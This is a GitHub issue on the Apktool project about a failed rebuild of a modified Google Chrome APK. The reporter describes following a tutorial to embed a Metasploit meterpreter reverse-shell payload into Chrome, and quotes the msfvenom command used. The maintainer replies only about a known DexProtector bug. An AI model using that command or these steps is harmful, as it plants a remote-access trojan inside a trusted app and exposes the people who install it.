### ISSUE TITLE
Recompiling problem (Google Chrome)

### ISSUE THREAD

**Issue by littledevilvito** [iBotPeaches/Apktool#2098]
### Information
1. **Apktool Version (`apktool -version`)** - 2.4.0
2. **Operating System (Mac, Linux, Windows)** - Linux (kali)
3. **APK From? (Playstore, ROM, Other)** - Playstore / APKMirror

### Stacktrace/Logcat

```
https://pastebin.com/MpD9Qekg
```

### Steps to Reproduce
I followed [this](https://null-byte.wonderhowto.com/how-to/embed-metasploit-payload-original-apk-file-part-2-do-manually-0167124/) tutorial step by step
1. I Created a Payload `msfvenom -p android/meterpreter/reverse_tcp LHOST=XXX LPORT=4444 -o meterpreter.apk`
2. Decompiled both the Payload and the Chrome.apk
3. Fused the files like said in the tutorial
4.  used `apktool empty-framework-dir --force `
5. `apktool b files/original` & `apktool d files/original` both with the same outcome

### Frameworks
If this APK is from an OEM ROM (Samsung, HTC, LG). Please attach framework files
(`.apks` that live in `/system/framework` or `/system/priv-app`)

### APK
If this APK can be freely shared, please upload/attach a link to it.
https://play.google.com/store/apps/details?id=com.android.chrome
https://www.apkmirror.com/apk/google-inc/chrome/chrome-74-0-3729-157-release/google-chrome-fast-secure-74-0-3729-157-android-apk-download/download/

### Questions to ask before submission
1. Have you tried `apktool d`, `apktool b` without changing anything? YES
2. If you are trying to install a modified apk, did you resign it? N/A
3. Are you using the latest apktool version? YES

**Comment by iBotPeaches** [comment]
This is a known issue with DexProtector is still open. See duplicate: #1474

**Comment by littledevilvito** [comment]
So? Wait? #1474 is open since 2 years and nothing new

**Comment by iBotPeaches** [comment]
Correct. Are you offering a chance to step in and fix it? :)

**Comment by littledevilvito** [comment]
Tbh I am not...
